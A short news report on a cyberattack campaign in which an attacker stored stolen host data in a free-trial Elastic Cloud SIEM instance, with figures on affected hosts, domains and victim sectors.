A campaign exploiting multiple software flaws to steal system data and store it in a cloud-based security platform has been uncovered by cybersecurity researchers, with investigators noting a threat actor used a free-trial Elastic Cloud SIEM instance to collect and analyse data from compromised systems across dozens of organisations.
According to the investigation, the attacker deployed an encoded PowerShell command on compromised systems that gathered detailed host information, transmitting it to an ElasticSearch index named "systeminfo" to aid triage and target prioritisation through SIEM tools. The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days, with the operator interacting via the Kibana interface and logging hundreds of actions.
Data recovered shows the campaign affected at least 216 hosts across 34 Active Directory domains, predominantly servers running Windows Server 2019 or 2022. Victims spanned government, universities, financial services, manufacturing, IT service providers and retailers, with some evidence suggesting exploitation of other platforms such as Microsoft SharePoint; the cloud instance has since been taken offline.